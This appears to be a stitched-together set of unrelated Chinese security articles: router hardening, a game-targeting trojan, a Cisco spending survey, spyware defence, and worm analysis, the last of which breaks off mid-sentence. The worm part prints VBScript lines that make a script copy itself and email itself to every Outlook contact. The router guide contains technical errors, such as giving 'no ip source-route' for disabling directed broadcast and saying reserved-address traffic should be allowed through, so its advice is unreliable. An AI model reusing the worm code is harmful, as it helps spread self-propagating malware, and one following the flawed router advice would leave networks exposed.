對于大多數企業局域網來說，路由器已經成為正在使用之中的最重要的安全設備之一。一般來說，大多數網絡都有一個主要的接入點。這就是通常與專用防火墻一起使用的“邊界路由器”。

經過恰當的設置，邊界路由器能夠把幾乎所有的最頑固的壞分子擋在網絡之外。如果你愿意的話，這種路由器還能夠讓好人進入網絡。不過，沒有恰當設置的路由器只是比根本就沒有安全措施稍微好一點。

在下列指南中，我們將研究一下你可以用來保護網絡安全的9個方便的步驟。這些步驟能夠保證你擁有一道保護你的網絡的磚墻，而不是一個敞開的大門。

1.修改默認的口令!

據卡內基梅隆大學的CERT/CC(計算機應急反應小組/控制中心)稱，80%的安全突破事件是由薄弱的口令引起的。網絡上有大多數路由器的廣泛的默認口令列表。你可以肯定在某些地方的某個人會知道你的生日。SecurityStats.com網站維護一個詳盡的可用/不可用口令列表，以及一個口令的可靠性測試。

2.關閉IP直接廣播(IP Directed Broadcast)

你的服務器是很聽話的。讓它做什么它就做什么，而且不管是誰發出的指令。Smurf攻擊是一種拒絕服務攻擊。在這種攻擊中，攻擊者使用假冒的源地址向你的網絡廣播地址發送一個“ICMP echo”請求。這要求所有的主機對這個廣播請求做出回應。這種情況至少會降低你的網絡性能。

參考你的路由器信息文件，了解如何關閉IP直接廣播。例如，“Central(config)#no ip source-route”這個指令將關閉思科路由器的IP直接廣播地址。

3.如果可能，關閉路由器的HTTP設置

正如思科的技術說明中簡要說明的那樣，HTTP使用的身份識別協議相當于向整個網絡發送一個未加密的口令。然而，遺憾的是，HTTP協議中沒有一個用于驗證口令或者一次性口令的有效規定。

雖然這種未加密的口令對于你從遠程位置(例如家里)設置你的路由器也許是非常方便的，但是，你能夠做到的事情其他人也照樣可以做到。特別是如果你仍在使用默認的口令!如果你必須遠程管理路由器，你一定要確保使用SNMPv3以上版本的協議，因為它支持更嚴格的口令。

4.封鎖ICMP ping請求

ping的主要目的是識別目前正在使用的主機。因此，ping通常用于更大規模的協同性攻擊之前的偵察活動。通過取消遠程用戶接收ping請求的應答能力，你就更容易避開那些無人注意的掃描活動或者防御那些尋找容易攻擊的目標的“腳本小子”(script kiddies)。

請注意，這樣做實際上并不能保護你的網絡不受攻擊，但是，這將使你不太可能成為一個攻擊目標。

5.關閉IP源路由

IP協議允許一臺主機指定數據包通過你的網絡的路由，而不是允許網絡組件確定最佳的路徑。這個功能的合法的應用是用于診斷連接故障。但是，這種用途很少應用。這項功能最常用的用途是為了偵察目的對你的網絡進行鏡像，或者用于攻擊者在你的專用網絡中尋找一個后門。除非指定這項功能只能用于診斷故障，否則應該關閉這個功能。

6.確定你的數據包過濾的需求

封鎖端口有兩項理由。其中之一根據你對安全水平的要求對于你的網絡是合適的。

對于高度安全的網絡來說，特別是在存儲或者保持秘密數據的時候，通常要求經過允許才可以過濾。在這種規定中，除了網路功能需要的之外，所有的端口和IP地址都必要要封鎖。例如，用于web通信的端口80和用于SMTP的110/25端口允許來自指定地址的訪問，而所有其它端口和地址都可以關閉。

大多數網絡將通過使用“按拒絕請求實施過濾”的方案享受可以接受的安全水平。當使用這種過濾政策時，可以封鎖你的網絡沒有使用的端口和特洛伊木馬或者偵查活動常用的端口來增強你的網絡的安全性。例如，封鎖139端口和445(TCP和UDP)端口將使黑客更難對你的網絡實施窮舉攻擊。封鎖31337(TCP和UDP)端口將使Back orifice木馬程序更難攻擊你的網絡。

這項工作應該在網絡規劃階段確定，這時候安全水平的要求應該符合網絡用戶的需求。查看這些端口的列表，了解這些端口正常的用途。

7.建立準許進入和外出的地址過濾政策

在你的邊界路由器上建立政策以便根據IP地址過濾進出網絡的違反安全規定的行為。除了特殊的不同尋常的案例之外，所有試圖從你的網絡內部訪問互聯網的IP地址都應該有一個分配給你的局域網的地址。例如，192.168.0.1這個地址也許通過這個路由器訪問互聯網是合法的。但是，216.239.55.99這個地址很可能是欺騙性的，并且是一場攻擊的一部分。

相反，來自互聯網外部的通信的源地址應該不是你的內部網絡的一部分。因此，應該封鎖入網的192.168.X.X、172.16.X.X和10.X.X.X等地址。

最后，擁有源地址的通信或者保留的和無法路由的目標地址的所有的通信都應該允許通過這臺路由器。這包括回送地址127.0.0.1或者E類(class E)地址段240.0.0.0-254.255.255.255。

8.保持路由器的物理安全

從網絡嗅探的角度看，路由器比集線器更安全。這是因為路由器根據IP地址智能化地路由數據包，而集線器相所有的節點播出數據。如果連接到那臺集線器的一個系統將其網絡適配器置于混亂的模式，它們就能夠接收和看到所有的廣播，包括口令、POP3通信和Web通信。

然后，重要的是確保物理訪問你的網絡設備是安全的，以防止未經允許的筆記本電腦等嗅探設備放在你的本地子網中。

9.花時間審閱安全記錄

審閱你的路由器記錄(通過其內置的防火墻功能)是查出安全事件的最有效的方法，無論是查出正在實施的攻擊還是未來攻擊的征候都非常有效。利用出網的記錄，你還能夠查出試圖建立外部連接的特洛伊木馬程序和間諜軟件程序。用心的安全管理員在病毒傳播者作出反應之前能夠查出“紅色代碼”和“Nimda”病毒的攻擊。

此外，一般來說，路由器位于你的網絡的邊緣，并且允許你看到進出你的網絡全部通信的狀況。

今年的網絡游戲可謂是一枝獨秀，人氣旺盛。網絡游戲已經成為很多人另外一個生活的世界，網絡游戲中的很多裝備甚至級別高的賬號本身也成為了玩家的財產，在現實世界中用現金來進行交易。于是，在這樣的誘惑下，黑客已經開始瞄上了網絡游戲。

　　近日，某公司截獲了首例能感染網絡游戲的木馬病毒，該病毒專門針對國內第二大棋牌類網絡游戲：“邊鋒”游戲。該病毒通過電子郵件進行傳播，如果“邊鋒”游戲的用戶收到了病毒郵件，并打開附件，就感染了該木馬病毒。

　　據介紹：用戶感染了這種木馬病毒后，不僅會將自己的用戶名、密碼外泄，而且在游戲中辛辛苦苦賺來的虛擬貨幣也將被他人竊取；該木馬同時還會將中招的電腦共享到互聯網上，被黑客遠程控制。目前這種木馬還沒有進行廣泛傳播，但是，已經有很多惡意的玩家已經在利用這種木馬盜取別人的賬號了，請“邊鋒”游戲的玩家慎重對待別人發送的電子郵件。

　　業內人士分析，隨著網絡游戲用戶不斷增多，針對網絡游戲的病毒與黑客行為也會越來越多，廣大游戲玩家一定要提高警惕，并隨時升級您的病毒庫！

　　該木馬的病毒名稱為：Trojan.Benfgame.214310，如果您沒有安裝殺毒軟件，而懷疑自己中了此種木馬病毒，可以進行手工清除：

　　(1)先打開注冊表編輯器；

　　(2)編輯注冊表，恢復注冊表中被病毒程序修改的文件關聯，并記住被修改的默認關聯(病毒程序的名字)。如exe文件的默認關聯為"%1"%*，chm文件的默認關聯為hh"%1"，txt文件的默認關聯為Notepad %1,scr文件的默認關聯為"%1" /S；

　　(3)然后打開進程管理器，用進程管理器關掉正在運行的病毒程序(被修改的默認關聯病毒程序和MSCVT2.EXE)；

　　(4)編輯注冊表中的HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun，找到鍵值MSBenCheck，并將其刪除；

　　(5)刪除掉病毒生成的文件，但不要刪除系統目錄下的那個控件Mswinsck.ocx；

　　(6)修改Windows目錄下的win.ini文件，刪除[windows]欄中“run=C:WINDOWSMSCVT2.EXE”。

思科公司日前宣布了對全球IT決策者的最終調查結果。結果顯示，許多決策者都承認信息安全方面的求助數量不斷攀升。此外，為了將安全保護擴展到越來越多的移動工作人員，大多數決策人都表示將在2007年增加安全開支 ，且有2/5的決策者表示2007年的安全開支將會增加10% 以上。


今年夏天，獨立的第三方市場調研公司在全球范圍內針對移動工作人員開展了一系列深入調查，得到了10個國家1,000多名遠程工作人員和1,000多名 IT 決策者的反饋，包括美國、英國、法國、德國、意大利、日本、中國、印度、澳大利亞和巴西，思科日前宣布的正是這些調查的最終結果。最新調查結果肯定了10月份調查結果的準確性，證明遠程工作人員在安全意識與實際行為之間存在矛盾，并且未能正確理解 IT 部門在控制員工使用筆記本電腦、個人數字助理（PDA）和智能電話等設備上所起的作用。


總體來說，有 38% 的 IT 決策人稱，與安全相關的求助呼叫有所增加。主要包括用戶及其設備無法抵御病毒攻擊、網頁仿冒掃描、身份盜用、黑客及其他惡意行為等問題。在印度，超過一半（55%）的IT 受調查者報告說與安全相關的呼叫有所增加，大多數問題與病毒（70%）、基于垃圾郵件的網頁仿冒攻擊（61%）和間諜軟件（55%）相關。總體而言，垃圾郵件和網頁仿冒是協助中心遇到的最常見的問題——在所有的 IT 受調查者中，一半以上（52%）都報告說求助呼叫增加與此類問題有關。


因此，每三名IT受調查者中就有兩人（67%）聲稱將在2007年增加與安全相關的 IT 開支。2/5的受調查者（41%） 預計明年將增加10%以上的安全投資。其中尤以中國、印度和巴西為甚 - 這三個國家是相對較新的互聯網市場，也是全球網絡經濟增長速度最快的三個國家。以下是計劃在2007年增長安全投資的IT受調查者的百分比：


1. 中國：90%；52% 的公司計劃將安全開支增加 10% 以上


2. 印度：82%；66% 的公司計劃將安全開支增加 10% 以上


3. 巴西：81%；65% 的公司計劃將安全開支增加 10% 以上


4. 美國：66%；44% 的公司計劃將安全開支增加 10% 以上


5. 意大利：66%；34% 的公司計劃將安全開支增加 10% 以上


6. 德國：63%；27% 的公司計劃將安全開支增加 10% 以上


7. 英國：61%；33% 的公司計劃將安全開支增加 10% 以上


8. 澳大利亞：55%；36% 的公司計劃將安全開支增加 10% 以上


9. 日本：54%；24% 的公司計劃將安全開支增加 10% 以上


10. 法國：51%；29% 的公司計劃將安全開支增加 10% 以上上


平均值：67%；41% 的公司計劃將安全開支增加 10% 以上


思科安全解決方案營銷副總裁 Jeff Platon 說：“這些調查結果與上個月的調查結果驚人的相似。”先前的調查顯示，全世界約2/3（67%）的遠程工作人員聲稱自己在遠程工作時能夠認識到安全的重要性。然而，他們中間有許多人都曾使用辦公計算機搭用鄰居的無線網絡，打開來源不明的電子郵件，將商業文件下載到個人電腦上，并與非員工用戶共享工作設備。此外，在談到公司設備的使用控制權時，大多數的遠程工作人員都認為部門經理比IT人員權利更高，有些人甚至認為他們如何使用公司設備根本與 IT無關。


Platon 說：“這些調查結果給 IT 和安全團隊敲響了警鐘。結果明確顯示，用戶具有安全意識并不一定代表他們擁有安全行為。此外，由于許多用戶都忽視了 IT 部門的作用，因此不愿與 IT 部門自由交流，從而未能采用最佳業務實踐，難怪 IT 要被動應對越來越多的求助呼叫并增加安全開支。了解到這個現象的幕后原因，將敦促IT 部門采取更先進的低成本方法來保護公司數據和員工。”


據思科首席安全官 John N. Stewart 稱，此類方法需要領導層一致地推行“安全意識文化”。Stewart 建議公司針對不同的用戶和企業文化定制培訓項目，在整個公司和各級組織級別都任命安全先進代表，并加大獎勵和表彰力度。他說：“通過生動的安全事故教育可幫助員工提高對安全重要性的認識。”


Stewart 補充說：“技術對安全至關重要，但不是唯一的決定因素。保護安全性是以人為核心的，涉及到溝通以及堅定不移地實施教育、培訓和獎勵計劃等問題。如果將IT和用戶的關系與技術解決方案緊密關聯在一起，IT 部門自然會發揮戰略顧問的作用，推動形成注重安全的企業文化。這時，CIO 和CSO （首席安全官）將能夠共同優化安全解決方案的回報，同時防止出現影響生產率的風險。簡而言之，就是能夠幫助企業取得成功。

間諜軟件（spyware）的一個共同特點是，能夠附著在共享文件、可執行圖像以及各種免費軟件當中，并趁機潛入用戶的系統，而用戶對此毫不知情。間諜軟件的主要用途是跟蹤用戶的上網習慣，有些間諜軟件還可以記錄用戶的鍵盤操作，捕捉并傳送屏幕圖像。間諜程序總是與其他程序捆綁在一起，用戶很難發現它們是什么時候安裝的。一旦間諜軟件進入計算機系統，要想徹底清除它們就會十分困難，而且間諜軟件往往成為不法分子手中的危險工具。

Gartner的分析專家認為，間諜軟件就目前來說還是良性的，不過間諜軟件在未來將會變得更具威脅性，不僅可以竊取口令、信用卡號，而且還可以偷走各種類型的身份信息，用于一些更加險惡的目的，如捕捉和傳送Word和Excel文檔，竊取企業秘密等。如果間諜軟件打開通向用戶桌面系統的通道，那么用戶面臨的危險將是不可想象的。

如何避免間諜軟件　

強制使用安全策略是防止間諜軟件的第一道防線，具體措施包括：使用微軟的域名安全策略來配置桌面瀏覽器和Outlook；阻斷ActiveX和其他可執行文件；管理腳本文件；通過HTTP代理來過濾Web內容。

如果員工不需要使用Internet來完成自己的工作，還可以斷開他們的網絡連接。此外，對員工進行培訓，使他們知道如何在Web上安全沖浪，在培訓中需要注意以下幾點：不要下載對等程序或任何無法確定其安全性的程序；不要點擊諸如跳舞的小熊等有趣的圖片；在咨詢IT部門之前，不要下載免費軟件；最關鍵的原則是，如果工作不需要，就不要點擊無關內容。

如何探測間諜軟件

即使用戶已經實施了上述策略，間諜軟件仍有可能乘虛而入。過濾軟件廠商Websense推出了一種被稱為客戶端應用模塊（Client Application Module，CAM ）的產品，并在其中增加了一些全新的反間諜軟件功能。該組件可以作為插件安裝到Websense的Websense Enterprise集中管理器當中，能夠在間諜軟件進入網絡中的計算機之前攔截它們。如果一些間諜軟件通過了這道屏障，CAM也可以利用內核中的過濾驅動程序阻止其執行。這一驅動程序可以對間諜程序進行分類查找，并阻止間諜軟件離開。通過這種方式，Websense可以找到那些穿過防線的間諜軟件。Websense還可以通過報告機制通知管理員應當對哪些計算機采取措施。

除了Websense　CAM外，利用商業工具和一些免費軟件，人們也能減小計算機感染間諜軟件的概率。殺毒軟件能夠阻止部分間諜軟件發作，桌面工具也可以清除受害機器上的間諜軟件。可以肯定的是，Web過濾是最有效的辦法，它可以將大部分的間諜軟件拒之門外。

如何清除間諜軟件

對于那些穿過Web過濾器的間諜軟件，如果不使用自動化的間諜軟件清除工具，人們將很難將它們清除干凈。根據CDT關于間諜軟件的一份報告，多數間諜軟件都具有抗刪除的能力。間諜軟件會在系統注冊表中遺留下許多后門，并且很難清除干凈。要想徹底消除，就必須分解注冊表的每一項，并且需要知道查找哪些文件。Lavasoft公司專門推出了一種Ad-Aware間諜軟件消除軟件。除了Ad-Aware外，還有一種稱為Spy Bot的免費軟件產品，Spy Bot可以清除更多的間諜軟件，而且不需要進行太多的自定義配置。

凡能夠引起計算機故障，破壞計算機數據的程序統稱為計算機病毒。所以從這個意義上說，蠕蟲也是一種病毒！網絡蠕蟲病毒，作為對互聯網危害嚴重的 一種計算機程序，其破壞力和傳染性不容忽視。與傳統的病毒不同，蠕蟲病毒以計算機為載體，以網絡為攻擊對象！本文中將蠕蟲病毒分為針對企業網絡和個人用戶2類，并從企業用戶和個人用戶兩個方面探討蠕蟲病毒的特征和一些防范措施!

本文根據蠕蟲病毒的發作機制，將其分為利用系統級別漏洞（主動傳播）和利用社會工程學(欺騙傳播)兩種，并從用戶角度中將蠕蟲病毒分為針對企業網絡和個人用戶2類，從企業用戶和個人用戶兩個方面探討蠕蟲病毒的特征和一些防范措施!

一、蠕蟲病毒的定義

1.蠕蟲病毒的定義

計算機病毒自出現之日起，就成為計算機的一個巨大威脅，而當網絡迅速發展的時候，蠕蟲病毒引起的危害開始顯現！從廣義上定義，凡能夠引起計算機故障，破壞計算機數據的程序統稱為計算機病毒。所以從這個意義上說，蠕蟲也是一種病毒！但是蠕蟲病毒和一般的病毒有著很大的區別。對于蠕蟲，現在還沒有一個成套的理論體系，一般認為，蠕蟲是一種通過網絡傳播的惡性病毒，它具有病毒的一些共性，如傳播性，隱蔽性，破壞性等等，同時具有自己的一些特征，如不利用文件寄生（有的只存在于內存中），對網絡造成拒絕服務，以及和黑客技術相結合等等！在產生的破壞性上，蠕蟲病毒也不是普通病毒所能比擬的，網絡的發展使得蠕蟲可以在短短的時間內蔓延整個網絡，造成網絡癱瘓！

根據使用者情況可將蠕蟲病毒分為2類，一種是面向企業用戶和局域網而言，這種病毒利用系統漏洞，主動進行攻擊，可以對整個互聯網可造成癱瘓性的后果!以“紅色代碼”，“尼姆達”，以及最新的“sql蠕蟲王”為代表。另外一種是針對個人用戶的，通過網絡(主要是電子郵件，惡意網頁形式)迅速傳播的蠕蟲病毒，以愛蟲病毒，求職信病毒為例.在這兩類中，第一類具有很大的主動攻擊性，而且爆發也有一定的突然性，但相對來說，查殺這種病毒并不是很難。第二種病毒的傳播方式比較復雜和多樣，少數利用了微軟的應用程序的漏洞，更多的是利用社會工程學()對用戶進行欺騙和誘使，這樣的病毒造成的損失是非常大的，同時也是很難根除的，比如求職信病毒，在2001年就已經被各大殺毒廠商發現，但直到2002年底依然排在病毒危害排行榜的首位就是證明！出得在接下來的內容中，將分別分析這兩種病毒的一些特征及防范措施!

2.蠕蟲病毒與一般病毒的異同

蠕蟲也是一種病毒，因此具有病毒的共同特征。一般的病毒是需要的寄生的，它可以通過自己指令的執行，將自己的指令代碼寫到其他程序的體內，而被感染的文件就被稱為”宿主”，例如，windows下可執行文件的格式為pe格式(Portable Executable)，當需要感染pe文件時，在宿主程序中，建立一個新節，將病毒代碼寫到新節中，修改的程序入口點等，這樣，宿主程序執行的時候，就可以先執行病毒程序，病毒程序運行完之后，在把控制權交給宿主原來的程序指令。可見，病毒主要是感染文件，當然也還有像DIRII這種鏈接型病毒，還有引導區病毒。引導區病毒他是感染磁盤的引導區，如果是軟盤被感染，這張軟盤用在其他機器上后，同樣也會感染其他機器，所以傳播方式也是用軟盤等方式。

蠕蟲一般不采取利用pe格式插入文件的方法，而是復制自身在互聯網環境下進行傳播，病毒的傳染能力主要是針對計算機內的文件系統而言，而蠕蟲病毒的傳染目標是互聯網內的所有計算機.局域網條件下的共享文件夾，電子郵件email，網絡中的惡意網頁，大量存在著漏洞的服務器等都成為蠕蟲傳播的良好途徑。網絡的發展也使得蠕蟲病毒可以在幾個小時內蔓延全球!而且蠕蟲的主動攻擊性和突然爆發性將使得人們手足無策!

　　　　　　 普通病毒 蠕蟲病毒
存在形式 寄存文件 獨立程序
傳染機制 宿主程序運行 主動攻擊
傳染目標 本地文件 網絡計算機




可以預見，未來能夠給網絡帶來重大災難的主要必定是網絡蠕蟲!

3.蠕蟲的破壞和發展趨勢

1988年一個由美國CORNELL大學研究生莫里斯編寫的蠕蟲病毒蔓延造成了數千臺計算機停機，蠕蟲病毒開始現身網絡;而后來的紅色代碼，尼姆達病毒瘋狂的時候，造成幾十億美元的損失；北京時間2003年1月26日， 一種名為“2003蠕蟲王”的電腦病毒迅速傳播并襲擊了全球，致使互聯網網路嚴重堵塞，作為互聯網主要基礎的域名服務器（DNS）的癱瘓造成網民瀏覽互聯網網頁及收發電子郵件的速度大幅減緩，同時銀行自動提款機的運作中斷， 機票等網絡預訂系統的運作中斷，信用卡等收付款系統出現故障!專家估計，此病毒造成的直接經濟損失至少在12億美元以上!



病毒名稱 持續時間 造成損失莫里斯蠕蟲 1988年
6000多臺計算機停機，直接經濟損失達9600萬美元! 美麗殺手
1999年 政府部門和一些大公司緊急關閉了網絡服務器，
經濟損失超過12億美元!愛蟲病毒
2000年5月至今
眾多用戶電腦被感染，損失超過100億美元以上 紅色代碼
2001年7月 網絡癱瘓，直接經濟損失超過26億美元 求職信
2001年12月至今 大量病毒郵件堵塞服務器，損失達數百億美元 蠕蟲王
2003年1月 網絡大面積癱瘓，銀行自動提款機運做中斷，直接經濟損失超過26億美元


由表可以知道，蠕蟲病毒對網絡產生堵塞作用，并造成了巨大的經濟損失!

通過對以上蠕蟲病毒的分析，可以知道，蠕蟲發作的一些特點和發展趨勢:

1.利用操作系統和應用程序的漏洞主動進行攻擊.. 此類病毒主要是“紅色代碼”和“尼姆達”，以及至今依然肆虐的”求職信”等.由于IE瀏覽器的漏洞(Iframe Execcomand)，使得感染了“尼姆達”病毒的郵件在不去手工打開附件的情況下病毒就能激活，而此前即便是很多防病毒專家也一直認為，帶有病毒附件的郵件，只要不去打開附件，病毒不會有危害。“紅色代碼”是利用了微軟IIS服務器軟件的漏洞(idq.dll遠程緩存區溢出)來傳播。Sql蠕蟲王病毒則是利用了微軟的數據庫系統的一個漏洞進行大肆攻擊!

2.傳播方式多樣 如“尼姆達”病毒和”求職信”病毒，可利用的傳播途徑包括文件、電子郵件、Web服務器、網絡共享等等。

3.病毒制作技術與傳統的病毒不同的是，許多新病毒是利用當前最新的編程語言與編程技術實現的，易于修改以產生新的變種，從而逃避反病毒軟件的搜索。另外，新病毒利用Java、ActiveX、VB Script等技術，可以潛伏在HTML頁面里，在上網瀏覽時觸發。

4.與黑客技術相結合! 潛在的威脅和損失更大!以紅色代碼為例，感染后的機器的web目錄的\scripts下將生成一個root.exe，可以遠程執行任何命令，從而使黑客能夠再次進入!二、網絡蠕蟲病毒分析和防范

蠕蟲和普通病毒不同的一個特征是蠕蟲病毒往往能夠利用漏洞，這里的漏洞或者說是缺陷，我們分為2種，軟件上的缺陷和人為上的缺陷。軟件上的缺陷，如遠程溢出，微軟ie和outlook的自動執行漏洞等等，需要軟件廠商和用戶共同配合，不斷的升級軟件。而人為的缺陷，主要是指的是計算機用戶的疏忽。這就是所謂的社會工程學(social engineering)，當收到一封郵件帶著病毒的求職信郵件時候，大多數人都會報著好奇去點擊的。對于企業用戶來說，威脅主要集中在服務器和大型應用軟件的安全上，而個人用戶而言，主要是防范第二種缺陷。

1.利用系統漏洞的惡性蠕蟲病毒分析

在這種病毒中，以紅色代碼，尼姆達和sql蠕蟲為代表!他們共同的特征是利用微軟服務器和應用程序組件的某個漏洞進行攻擊，由于網上存在這樣的漏洞比較普遍，使得病毒很容易的傳播!而且攻擊的對象大都為服務器，所以造成的網絡堵塞現象嚴重!



以2003年1月26號爆發的sql蠕蟲為例，爆發數小時內席卷了全球網絡，造成網絡大塞車.亞洲國家中以人口上網普及率達七成的韓國所受影響較為嚴重。韓國兩大網絡業KFT及***電訊公司，系統都陷入了癱瘓，其它的網絡用戶也被迫斷線，更為嚴重的是許多銀行的自動取款機都無法正常工作， 美國許美國銀行統計，該行的13000臺自動柜員機已經無法提供正常提款。網絡蠕蟲病毒開始對人們的生活產生了巨大的影響!

這次sql蠕蟲攻擊的是微軟數據庫系Microsoft SQL Server 2000的，利用了MSSQL2000服務遠程堆棧緩沖區溢出漏洞， Microsoft SQL Server 2000是一款由Microsoft公司開發的商業性質大型數據庫系統。SQL Server監聽UDP的1434端口，客戶端可以通過發送消息到這個端口來查詢目前可用的連接方式（連接方式可以是命名管道也可以是TCP），但是此程序存在嚴重漏洞，當客戶端發送超長數據包時，將導致緩沖區溢出，黑客可以利用該漏洞在遠程機器上執行自己的惡意代碼。

微軟在200年7月份的時候就為這個漏洞發布了一個安全公告，但當sql蠕蟲爆發的時候，依然有大量的裝有ms sqlserver 2000的服務器沒有安裝最新的補丁，從而被蠕蟲病毒所利用，蠕蟲病毒通過一段376個字節的惡意代碼，遠程獲得對方主機的系統控制權限， 取得三個Win32 API地址，GetTickCount、socket、sendto，接著病毒使用GetTickCount獲得一個隨機數，進入一個死循環繼續傳播。在該循環中蠕蟲使用獲得的隨機數生成一個隨機的ip地址，然后將自身代碼發送至1434端口(Microsoft SQL Server開放端口)，該蠕蟲傳播速度極快，其使用廣播數據包方式發送自身代碼，每次均攻擊子網中所有255臺可能存在機器。由于這是一個死循環的過程，發包密度僅和機器性能和網絡帶寬有關，所以發送的數據量非常大。該蠕蟲對被感染機器本身并沒有進行任何惡意破壞行為，也沒有向硬盤上寫文件，僅僅存在與內存中。對于感染的系統，重新啟動后就可以清除蠕蟲，但是仍然會重復感染。由于發送數據包占用了大量系統資源和網絡帶寬，形成Udp Flood，感染了該蠕蟲的網絡性能會極度下降。一個百兆網絡內只要有一兩臺機器感染該蠕蟲就會導致整個網絡訪問阻塞。

通過以上分析可以知道，此蠕蟲病毒本身除了對網絡產生拒絕服務攻擊外，并沒有別的破壞措施.但如果病毒編寫者在編寫病毒的時候加入破壞代碼，后果將不堪設想!

2.企業防范蠕蟲病毒措施

此次sql蠕蟲病毒，利用的漏洞在2002年7月份微軟的一份安全公告中就有詳細說明！而且微軟也提供了安全補丁提供下載，然而在時隔半年之后互聯網上還有相當大的一部分服務器沒有安裝最新的補丁，其網絡管理員的安全防范意識可見一斑！

當前，企業網絡主要應用于文件和打印服務共享、辦公自動化系統、企業業務（MIS）系統、Internet應用等領域。網絡具有便利信息交換特性，蠕蟲病毒也可以充分利用網絡快速傳播達到其阻塞網絡目的。企業在充分地利用網絡進行業務處理時，就不得不考慮企業的病毒防范問題，以保證關系企業命運的業務數據完整不被破壞。

企業防治蠕蟲病毒的時候需要考慮幾個問題：病毒的查殺能力，病毒的監控能力，新病毒的反應能力。而企業防毒的一個重要方面是是管理和策略。推薦的企業防范蠕蟲病毒的策略如下：

(1)加強網絡管理員安全管理水平，提高安全意識。由于蠕蟲病毒利用的是系統漏洞進行攻擊，所以需要在第一時間內保持系統和應用軟件的安全性，保持各種操作系統和應用軟件的更新！由于各種漏洞的出現，使得安全不在是一種一勞永逸的事，而作為企業用戶而言，所經受攻擊的危險也是越來越大，要求企業的管理水平和安全意識也越來越高！

(2)建立病毒檢測系統。能夠在第一時間內檢測到網絡異常和病毒攻擊。

(3)建立應急響應系統，將風險減少到最小！由于蠕蟲病毒爆發的突然性，可能在病毒發現的時候已經蔓延到了整個網絡，所以在突發情況下，建立一個緊急響應系統是很有必要的，在病毒爆發的第一時間即能提供解決方案。



(4)建立災難備份系統。對于數據庫和數據系統，必須采用定期備份，多機備份措施，防止意外災難下的數據丟失！

(5)對于局域網而言，可以采用以下一些主要手段：A.在因特網接入口處安裝防火墻式防殺計算機病毒產品，將病毒隔離在局域網之外。B.對郵件服務器進行監控，防止帶毒郵件進行傳播！C.對局域網用戶進行安全培訓。D.建立局域網內部的升級系統，包括各種操作系統的補丁升級，各種常用的應用軟件升級，各種殺毒軟件病毒庫的升級等等！3.對個人用戶產生直接威脅的蠕蟲病毒

在以上分析的蠕蟲病毒中，只對安裝了特定的微軟組件的系統進行攻擊，而對廣大個人用戶而言，是不會安裝iis(微軟的因特網服務器程序，可以使允許在網上提供web服務)或者是龐大的數據庫系統的！因此上述病毒并不會直接攻擊個個人用戶的電腦(當然能夠間接的通過網絡產生影響)，但接下來分析的蠕蟲病毒，則是對個人用戶威脅最大，同時也是最難以根除，造成的損失也更大的一類蠕蟲病毒！

對于個人用戶而言，威脅大的蠕蟲病毒采取的傳播方式一般為電子郵件(Email)以及惡意網頁等等！

對于利用email傳播得蠕蟲病毒來說，通常利用的是社會工程學(Social Engineering)，即以各種各樣的欺騙手段那誘惑用戶點擊的方式進行傳播！

惡意網頁確切的講是一段黑客破壞代碼程序，它內嵌在網頁中，當用戶在不知情的情況下打開含有病毒的網頁時，病毒就會發作。這種病毒代碼鑲嵌技術的原理并不復雜，所以會被很多懷不良企圖者利用，在很多黑客網站竟然出現了關于用網頁進行破壞的技術的論壇，并提供破壞程序代碼下載，從而造成了惡意網頁的大面積泛濫，也使越來越多的用戶遭受損失。

對于惡意網頁，常常采取vb script和java script編程的形式！由于編程方式十分的簡單！所以在網上非常的流行！

Vb script和java script是由微軟操作系統的wsh（Windows Scripting HostWindows腳本主機）解析并執行的，由于其編程非常簡單，所以此類腳本病毒在網上瘋狂傳播，瘋狂一時的愛蟲病毒就是一種vbs腳本病毒，然后偽裝成郵件附件誘惑用戶點擊運行，更為可怕的是，這樣的病毒是以源代碼的形式出現的，只要懂得一點關于腳本編程的人就可以修改其代碼，形成各種各樣的變種。

下面以一個簡單的腳本為例：

Set objFs=CreateObject （“Scripting.FileSystemObject”）
(創建一個文件系統對象)objFs.CreateTextFile （"C:\virus.txt"， 1）
(通過文件系統對象的方法創建了TXT文件)



如果我們把這兩句話保存成為.vbs的VB腳本文件，點擊就會在C盤中創建一個TXT文件了。倘若我們把第二句改為：


objFs.GetFile （WScript.ScriptFullName）.Copy （"C:\virus.vbs"）


就可以將自身復制到C盤virus.vbs這個文件。本句前面是打開這個腳本文件，WScript.ScriptFullName指明是這個程序本身，是一個完整的路徑文件名。GetFile函數獲得這個文件，Copy函數將這個文件復制到C盤根目錄下virus.vbs這個文件。這么簡單的兩句就實現了自我復制的功能，已經具備病毒的基本特征——自我復制能力。

此類病毒往往是通過郵件傳播的，在vb script中調用郵件發送功能也非常的簡單，病毒往往采用的方法是向outlook中的地址薄中的郵件地址發送帶有包含自身的郵件來達到傳播目的，一個簡單的實例如下：


Set objOA=Wscript.CreateObject （"Outlook.Application"）
（創建一個OUTLOOK應用的對象）Set objMapi=objOA.GetNameSpace （"MAPI"）
（取得MAPI名字空間）For i=1 to objMapi.AddressLists.Count（遍歷地址簿）
Set objAddList=objMapi.AddressLists （i）
For j=1 To objAddList. AddressEntries.Count Set
objMail=objOA.CreateItem （0） objMail.Recipients.Add
（objAddList. AddressEntries
（j））
（取得收件人郵件地址 ）objMail.Subject="你好!"
（設置郵件主題，這個往往具有很大的誘惑性質）
objMail.Body="這次給你的附件，是我的新文檔！"
（設置信件內容）objMail.Attachments.Add （“c:\virus.vbs"）
（把自己作為附件擴散出去 ）objMail.Send（發送郵件）
NextNext Set objMapi=Nothing（清空objMapi變量，釋放資源）
set objOA=Nothing(清空objOA變量)



這一小段代碼的功能是向地址簿中的用戶發送電子郵件，并將自己作為附件擴散出去。這段代碼中的第一行是創建一個Outlook的對象，是必不可少的。在其下是一個循環，在循環中不斷地向地址簿中的電子郵件地址發送內容相同的信件。這就是蠕蟲的傳播性。

由此可以看出，利用vb script編寫病毒是非常容易的，這就使得此類病毒的變種繁多，破壞力極大，同時也是非常難以根除的！

4.個人用戶對蠕蟲病毒的防范措施

通過上述的分析，我們可以知道，病毒并不是非常可怕的，網絡蠕蟲病毒對個人用戶的攻擊主要還是通過社會工程學，而不是利用系統漏洞！所以防范此類病毒需要注意以下幾點：

